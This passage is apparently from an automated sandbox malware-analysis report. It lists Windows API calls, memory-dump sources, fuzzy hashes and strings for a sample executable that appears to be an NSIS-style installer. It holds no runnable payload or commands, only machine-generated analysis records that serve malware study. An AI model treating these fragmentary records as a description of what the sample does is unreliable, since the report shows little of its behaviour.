                                                                  • lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                  • lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                  • SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 2531174081-0
                                                                  • Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                                  • Instruction ID: 0122bdc4cc194b68d617bf21deccaf32741d68d09ea49b6ef8aede989cb0ca1f
                                                                  • Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                                  • Instruction Fuzzy Hash: F9219D71900618FACF119FA5DD84ACFBFB9EF45364F10843AF904B62A0C7794A419FA8
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,00000000), ref: 0040304E
                                                                  • GetTickCount.KERNEL32 ref: 0040306C
                                                                  • wsprintfW.USER32 ref: 0040309A
                                                                    • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                    • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                    • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                    • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 004030BE
                                                                  • ShowWindow.USER32(00000000,00000005), ref: 004030CC
                                                                    • Part of subcall function 00403017: MulDiv.KERNEL32(00000000,00000064,000025B1), ref: 0040302C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                  • String ID: ... %d%%
                                                                  • API String ID: 722711167-2449383134
                                                                  • Opcode ID: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
                                                                  • Instruction ID: 5115fc65002d889466af77c95cd87ea57bd417394e766d10746fa218fe5c3c06
                                                                  • Opcode Fuzzy Hash: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
                                                                  • Instruction Fuzzy Hash: CA01C830642610E7CB31AF50AE09A6B3FACAB04706F64043BF441B11D9D6B85A51CF9D
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FD7
                                                                  • GetMessagePos.USER32 ref: 00404FDF
                                                                  • ScreenToClient.USER32(?,?), ref: 00404FF9
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040500B
                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405031
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                  • Instruction ID: f32abc49a7be06d84d864a503b70a66925f192d82b82ee1d40ead4c3c6165fb8
                                                                  • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                  • Instruction Fuzzy Hash: 79015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B4AA058BA5
                                                                  APIs
                                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB6
                                                                  • wsprintfW.USER32 ref: 00402FEA
                                                                  • SetWindowTextW.USER32(?,?), ref: 00402FFA
                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                  • API String ID: 1451636040-1158693248
                                                                  • Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                                  • Instruction ID: 34bde3d48a8f942e304b41271f5ed33cd318c4bcfffe3c394610842cbdf8d478
                                                                  • Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                                  • Instruction Fuzzy Hash: 10F0317054020CABEF249F60DD4ABEE3B68EB40349F00C03AF606B51D0DBB99A55DB99
                                                                  APIs
                                                                    • Part of subcall function 734712BB: GlobalAlloc.KERNELBASE(00000040,?,734712DB,?,7347137F,00000019,734711CA,-000000A0), ref: 734712C5
                                                                  • GlobalFree.KERNEL32(?), ref: 73472743
                                                                  • GlobalFree.KERNEL32(00000000), ref: 73472778
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true
                                                                  • Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 1780285237-0
                                                                  • Opcode ID: cf6d106ff7a5b2931b1150adb3fe6392c722063e76548f5f11d796ff932b4022
                                                                  • Instruction ID: 5bbe8a3fb45065c8812acb21a4edeac6e1f1944b44b5434bb032f96df6f6bd4c
                                                                  • Opcode Fuzzy Hash: cf6d106ff7a5b2931b1150adb3fe6392c722063e76548f5f11d796ff932b4022
                                                                  • Instruction Fuzzy Hash: 8D31E072204149EFD72EAF65CAC4FEA77FAFB86344724452DF106A7260C73068059BA9
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                  • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                  • String ID:
                                                                  • API String ID: 2667972263-0
                                                                  • Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                                  • Instruction ID: 0665ed67c6e74a6a0a4f3ff5189880cf350c83190f31c90c7548f1ee6fedf688
                                                                  • Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                                  • Instruction Fuzzy Hash: 5731CF71D00124BBCF21AFA5CD89D9E7EB9AF48364F10023AF511762E1CB794C429B98
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                                  • wsprintfW.USER32 ref: 00404F58
                                                                  • SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s$H/B
                                                                  • API String ID: 3540041739-2222257793
                                                                  • Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                                  • Instruction ID: 614c6b03a1206c52a907a8f7c7d2435543e043070c0789599254521b237785a9
                                                                  • Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                                  • Instruction Fuzzy Hash: D911D5336041287BDB00666D9C45E9E329CEB85374F254637FA25F31D1EA79C82282E8
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true
                                                                  • Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: FreeGlobal
                                                                  • String ID:
                                                                  • API String ID: 2979337801-0
                                                                  • Opcode ID: 3bd22bd3f5825527ba261e98fe4bd6b1ebc2d0443657d4aa3bf16104c79cd080
                                                                  • Instruction ID: f6e1fa5b441a457655654564cd6aec28dbc25770fd897e95a44829581adda711
                                                                  • Opcode Fuzzy Hash: 3bd22bd3f5825527ba261e98fe4bd6b1ebc2d0443657d4aa3bf16104c79cd080
                                                                  • Instruction Fuzzy Hash: D651D532D00118EFDB1E9FB4C4887EDBBBAEB44314F188159D407B3394E671A946879D
                                                                  APIs
                                                                  • GlobalFree.KERNEL32(00000000), ref: 734725C2
                                                                    • Part of subcall function 734712CC: lstrcpynW.KERNEL32(00000000,?,7347137F,00000019,734711CA,-000000A0), ref: 734712DC
                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 73472548
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73472563
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true
                                                                  • Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                  • String ID:
                                                                  • API String ID: 4216380887-0
                                                                  • Opcode ID: cb5fc872e50590b55e64eb45579fa1e393915131f2b4d3016cea6310c5c44fca
                                                                  • Instruction ID: e8134326e2c479b41e529f3ced0515d9467827a95e14eb6d14dcb42c6081cd6a
                                                                  • Opcode Fuzzy Hash: cb5fc872e50590b55e64eb45579fa1e393915131f2b4d3016cea6310c5c44fca
                                                                  • Instruction Fuzzy Hash: 524124B140834AEFE76CEF24D840BA677F8FB44350F10491DF55A9B281E730A589CB69
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                  • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                  • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  • Opcode ID: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                                  • Instruction ID: 305ae2269dae07fc62aa10ca295236b4d3f8ba7b944ef9ab65218e6e9e6ea469
                                                                  • Opcode Fuzzy Hash: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                                  • Instruction Fuzzy Hash: FE210772A04119AFCB15DF98DE45AEEBBB5EF08304F14003AF945F62A0D7789D81DB98
                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00401E56
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                  • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                  • String ID:
                                                                  • API String ID: 3808545654-0
                                                                  • Opcode ID: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
                                                                  • Instruction ID: 3094fbe596e336cf4bf26b394f16fb1ed862d687e7810168c788cd964747d1d2
                                                                  • Opcode Fuzzy Hash: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
                                                                  • Instruction Fuzzy Hash: 74018871904240EFE7005BB4EE99BDD3FB4AF15301F20997AF581B62E2C6B904859BED
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,734722D8,?,00000808), ref: 734716D5
                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,734722D8,?,00000808), ref: 734716DC
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,734722D8,?,00000808), ref: 734716F0
                                                                  • GetProcAddress.KERNEL32(734722D8,00000000), ref: 734716F7
                                                                  • GlobalFree.KERNEL32(00000000), ref: 73471700
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true
                                                                  • Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                  • String ID:
                                                                  • API String ID: 1148316912-0
                                                                  • Opcode ID: 3ba033bb1ec5c1e7788e049094b94b9fb7fddea8a32e409be8c994ebb7b1e33e
                                                                  • Instruction ID: d6e30de207288eda9587456b6d3574930f193a48e971962149e918bcddf0a0a6
                                                                  • Opcode Fuzzy Hash: 3ba033bb1ec5c1e7788e049094b94b9fb7fddea8a32e409be8c994ebb7b1e33e
                                                                  • Instruction Fuzzy Hash: B3F012731061787BD6202AA79C4CDAB7E9CEF8B2F5B110615F61CA12A085614C01D7F1
                                                                  APIs
                                                                  • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 0040600A
                                                                  • CharNextW.USER32(00000000), ref: 0040600F
                                                                  • CharNextW.USER32(00000000), ref: 00406027
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\nspD8D5.tmp, xrefs: 00405FFD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nspD8D5.tmp
                                                                  • API String ID: 3213498283-917692060
                                                                  • Opcode ID: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                                  • Instruction ID: 6b36e5aaf6ec4384ffc5acae3f619c12edb839be27b3f0f06f1fa7befb24a934
                                                                  • Opcode Fuzzy Hash: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                                  • Instruction Fuzzy Hash: 00F0963198061595DE31F6584C45A7767BCDF55394B02807BE602B71C1D7B888E186DA
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F57
                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F61
                                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405F73
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F51
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
